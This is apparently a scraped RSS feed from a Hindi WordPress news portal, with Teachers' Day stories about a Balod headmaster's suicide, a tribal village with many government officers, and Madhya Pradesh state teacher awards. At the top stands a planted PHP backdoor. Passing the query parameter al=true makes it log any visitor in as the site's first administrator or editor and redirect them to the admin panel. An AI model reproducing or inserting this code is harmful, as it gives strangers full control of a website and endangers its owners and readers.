// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Teachers’ Day – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 06 Sep 2024 17:15:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-बालोद में टीचर्स डे के दिन हेडमास्टर ने की आत्महत्या, शव के पास मिला सुसाइड नोट https://pratyushaashakinayikiran.com/?p=67046 Fri, 06 Sep 2024 17:15:00 +0000 https://pratyushaashakinayikiran.com/?p=67046 बालोद.

डोंडी ब्लॉक के ग्राम ओडगांव में प्राथमिक शाला के हेडमास्टर देवेंद्र कुमार ठाकुर (57) ने अपने घर में फांसी लगाकर आत्महत्या कर ली। यह घटना उस वक्त की है, जब घर पर कोई भी मौजूद नहीं था। देवेंद्र ठाकुर की पत्नी भी शिक्षा विभाग में कार्यरत हैं और घटना के समय वो भी स्कूल में थीं।

मौके पर पहुंची पुलिस ने घटनास्थल से सुसाइड नोट बरामद किया किया है। हेडमास्टर ने सुसाइड नोट में अपनी मौत का जिम्मेदार चार लोगों को ठहराया है और नौकरी के नाम पर लाखों रुपये की ठगी करने की बाते सुसाइड नोट में  कही है। नौकरी लगाने के नाम पर लाखों रुपये का लेनदेन होने की बातें सामने आ रही हैं। हालांकि पुलिस जांच के बाद स्पस्ट होगा। वहीं, इस पूरे मामले में बालोद एडीशनल एसपी अशोक जोशी ने मृतक द्वारा अपने सुसाइड नोट में लिखे गए चार लोगों के नाम का उल्लेख किया है। उन्होंने कहा कि अभी जांच की जा रही है।

सुसाइड नोट में इनका उल्लेख
अतिरिक्त पुलिस अधीक्षक अशोक जोशी ने मृतक के पास से मिले सुसाइड नोट में मौत के लिए जिम्मेदार चार लोगों के नाम को सार्वजनिक कर दिया है। उन्होंने बताया कि घटनास्थल से मिले सुसाइड नोट में हरेंद्र नेताम, प्रदीप ठाकुर, मदार खान और मोहम्मद अकबर के नाम का उल्लेख है।

पुलिस जांच में होगा खुलासा
पुलिस अधीक्षक सृजन राम भगत ने कहा कि पूरे मामले में जांच चल रही है और जांच के बाद ही खुलासा हो पाएगा। उन्होंने कहा कि मामले में जानकारी मिली तो पूरी टीम वहां पर पहुंची हुई थी। मामले में प्रथम दृष्टया आत्महत्या होना पाया गया। सुसाइड नोट भी बरामद किया गया है। मर्ग कायम कर मामले को जांच में रखा गया है और जो भी इस घटना के पीछे जिम्मेदार रहेगा, उनके खिलाफ कड़ी से कड़ी कार्रवाई की जाएगी।

शिक्षक दिवस के दिन बड़ी घटना
पूरे जिले सहित पूरे प्रदेश एवं देश में आज शिक्षक दिवस मनाया जा रहा है। लोक शिक्षकों के सम्मान में विभिन्न आयोजन कर रहे हैं। शिक्षकों को गुरु का दर्जा दिया जाता है, परंतु यहां पर दिल दहला देने वाले घटना से शिक्षक संघ में काफी आक्रोश है और निष्पक्ष जांच की मांग लेकर आगे ज्ञापन भी दिए जा सकते हैं।

]]>
एक ऐसा जनजातीय गांव, जहां हर घर में हैं अधिकारी-कर्मचारी https://pratyushaashakinayikiran.com/?p=66429 Thu, 05 Sep 2024 09:35:00 +0000 https://pratyushaashakinayikiran.com/?p=66429 शिक्षा ने दिलाया बेहतर मुकाम
एक ऐसा जनजातीय गांव, जहां हर घर में हैं अधिकारी-कर्मचारी

भोपाल

मालवा अंचल का एक गाँव है पड़ियाल, जिसकी जनसंख्या 5 हजार 500 है। इस गांव से 100 से अधिक अधिकारी है जो देश-प्रदेश सहित आसपास के राज्यों में सेवारत है। इस गांव के हर घर में औसत एक शासकीय कर्मचारी भी हैं, जिनकी संख्या 300 है। यहां के युवकों में प्रतियोगी परीक्षाओं में आने की होड़ आजादी के समय से ही शुरू हो गई थी। इतना ही नहीं आजादी के बाद हुए विधानसभा चुनाव में यहां के बापू सिंह अलावा कुक्षी विधानसभा के पहले विधायक रहे।

यह गाँव धार जिले के डही विकासखंड के अंतर्गत आता है। जहां साक्षरता दर 90 प्रतिशत है। अधिकारियों के गांव के नाम से मशहूर पड़ियाल में लोग सिर्फ अफसर बनने का सपना देखते हैं। साथ ही यहाँ के युवा अमेरिका और मलेशिया जैसे देशों में कोई इंजीनियर है तो कोई बिजनेस कर रहा है। गाँव में हायर सेकेंडरी स्कूल है, जिसमें 23 शिक्षकों द्वारा 702 विद्यार्थियों को पढ़ाया-लिखाया जाता है।

गांव का सामाजिक ताना-बाना शिक्षा पर है केंद्रित

इस क्षेत्र में लंबे समय से बीआरसी के पद पर कार्य कर रहे मनोज दुबे ने शिक्षा की बेहतरी के लिए कई कार्य किए हैं। नतीजतन यहां शिक्षा की दर काफी ऊंची है। उन्होंने बताया कि गांव के 12 अधिकारी सेवानिवृत्त होकर जन-सेवा के कार्य कर रहे है। वर्तमान में अध्ययन कर रहे युवा बड़ों से प्रेरणा पाकर उच्च शिक्षा हासिल कर रहे है। गांव का सामाजिक ताना-बुना शिक्षा पर केन्द्रित रहता है। बीआरसी दुबे के मुताबिक पड़ियाल में कक्षा 6 से 12 वीं तक के विद्यार्थियों के लिए स्कूल में स्मार्ट क्लासेस शुरु की गई है। इस साल नीट में यहां के 4 विद्यार्थी जबकि जेईई मेंस में 3 विद्यार्थी चयनित होकर डॉक्टर और इंजीनियरिंग की पढ़ाई कर रहे है।

इनसे जाना जाता है गांव

एसपी सिंह (डीआईजी), लक्ष्मण सिंह सोलंकी (एडिशनल एसपी), नरेंद्र पाल सिंह (कार्यपालन यंत्री), एमपी सिंह (एसी पीडब्ल्यूडी), डीएस रणदा (अपर संचालक ग्रामीण विकास), नवल सिंह डोडवा (एसडीओ पीडब्ल्यूडी), बीएस चौहान (डीपीओ गृह विभाग), अर्जुन सिंह जमरा (एसडीओ पीडब्ल्यूडी), महेंद्र सिंह अलावा (महाप्रबंधक एयरपोर्ट नई दिल्ली), पर्वत सिंह अलावा (आईईएस रेलवे), महेंद्र पाल अलावा (आईईएस वायरलेस एंड लोकल लूप, मेडिकल ऑफिसर, डॉक्टर सुमेर सिंह अलावा, डॉक्टर के.सी. राणे, डॉक्टर केवल सिंह जमरा, लोकेन्द्र अलावा (एसडीओ आरईएस), करण रणदा (एसीएफ), सुखलाल अलावा (परियोजना अधिकारी जिला पंचायत), सुरेंद्र अलावा (प्रबंधक हेल्थ विभाग), मनीष अलावा (प्रबंधक उद्योग), मुकेश नंदा (एईओ आबकारी), विजेंद्र सिंह मुझाल्दा (प्लाटून कमांडर) सहित अन्य उच्च पदों पर अधिकारी बन देश-प्रदेश में सेवाएं दे रहे है।

गाँव की बेटियों ने भी किया नाम रोशन

इस गाँव की बेटियाँ भी किसी से कम नहीं है। यहाँ से पढ़-लिख कर अनेक बेटियों ने गाँव का नाम रोशन किया है। इसमें बबीता बामनिया (डीएसपी), कौशल्या चौहान (टीआई), शकुंतला बामनिया (टीआई), प्रियंका अलावा (थानेदार), रिंकी बामनिया (वाणिज्यिकर अधिकारी), शीतल अलावा (एई एमपीईबी), प्रिया रणदा (एईओ आबकारी), सुनयना डामोर (सिविल जज), गरिमा अलावा (उप निरीक्षक आबकारी), किरण जमरा (नायब तहसीलदार), सुचित्रा रणदा (कराधान अधिकारी), मीना अलावा (सहायक आयुक्त), डॉ. निधि सिंह (एमएस), डॉ. वस्ती रणदा (एमडी), डॉ. निलमणी अलावा (एमएस), डॉ. रिंकू रणदा (एमडी), डॉ. रश्मि रणदा (एमडी), डॉ. अंजना अलावा (प्रोफेसर), डॉ. अनुभूति अलावा (बीडीएस), डॉ. नेहा अलावा (एमएस), डॉ. शर्मिला जमरा (एमडी), संतोषी अलावा (प्रोफेसर), बसंती अलावा (प्रोफेसर) सहित अन्य बेटियाँ उच्च पदों पर पदस्थ है।

 

]]>
MP के 14 शिक्षकों को मिलेगा राज्यस्तरीय शिक्षक पुरस्कार, शिक्षक दिवस पर होंगे सम्मानि https://pratyushaashakinayikiran.com/?p=65615 Tue, 03 Sep 2024 15:56:00 +0000 https://pratyushaashakinayikiran.com/?p=65615 भोपाल
 इस वर्ष सरकारी स्कूलों के 14 शिक्षकों को राज्य स्तरीय शिक्षक पुरस्कार प्रदान किया जाएगा। इसमें भोपाल से एक शिक्षक उच्च माध्यमिक श्रेणी में शासकीय उत्कृष्ट उमावि के व्याख्याता राजेंद्र जसूजा का नाम शामिल हैं। इस वर्ष का राज्यस्तरीय शिक्षक सम्मान समारोह पांच सितंबर को शिक्षक दिवस के अवसर पर प्रशासन अकादमी के स्वर्ण जयंती हाल में आयोजित किया जाएगा।

समारोह में 14 शिक्षकों को और पिछले वर्ष राष्ट्रीय शिक्षक पुरस्कार-2023 के पुरस्कृत दो शिक्षकों को सम्मानित किया जाएगा। इसमें प्राथमिक व माध्यमिक श्रेणी में आठ शिक्षकों और उच्चतर माध्यमिक श्रेणी में छह को राज्यस्तरीय शिक्षक पुरस्कार के लिए चयन किया गया है। शिक्षकों को सम्मान राशि 25 हजार रुपये, शाल,-श्रीफल एवं प्रशस्ति-पत्र से सम्मानित किया जाएगा।

प्रथमिक व माध्यमिक श्रेणी के ये चयनित शिक्षक
दमोह जिले के शासकीय प्राथमिक शाला देवरान टपरिया की प्राथमिक शिक्षक शीला पटेल, शाजापुर जिले के शासकीय नवीन प्रायमरी स्कूल ताजपुर के प्राथमिक शिक्षक वैभव तिवारी, ग्वालियर जिले के शासकीय माध्यमिक शाला बाडौरी मुरार के शिक्षक बृजेश कुमार शुक्ला, छिंदवाड़ा के शासकीय प्राथमिक शाला कउआखेड़ा के प्राथमिक शिक्षक राकेश कुमार मालवीय, गुना जिले के शासकीय माध्यमिक शाला समरसिंगा के प्राथमिक शिक्षक राजीव कुमार शर्मा, राजगढ़ जिले के बांगुपरा शासकीय प्राथमिक स्कूल के प्राथमिक शिक्षक सुरेश कुमार दांगी, खंडवा जिले की शा. प्राथमिक शाला झूमरखाली की शिक्षिका नीतू ठाकुर, सिवनी के शासकीय प्राथमिक शाला भीरा खंडवा के शिक्षक संजय कुमार रजक के नाम शामिल हैं।

उच्चतर माध्यमिक श्रेणी में ये होंगे पुरस्कृत
इंदौर के गुरुकुलम महू के उच्च माध्यमिक शिक्षक जगदीश सोलंकी, छिंदवाड़ा के शासकीय उत्कृष्ट उमावि की शिक्षिका अमिता शर्मा, मंदसौर के शा. बालक उच्चतर माध्यमिक विद्यालय नंबर-2 की शिक्षिका कीर्ति सक्सेना, भोपाल के शासकीय उत्कृष्ट उमावि के व्याख्याता राजेंद्र जसूजा, उज्जैन के शासकीय कन्या उमावि सराफा की उच्च माध्यमिक शिक्षक ज्योति तिवारी, शहडोल के शासकीय एमएलवी उमावि की माध्यमिक शिक्षक अंजना द्विवेदी का नाम शामिल हैं।

]]>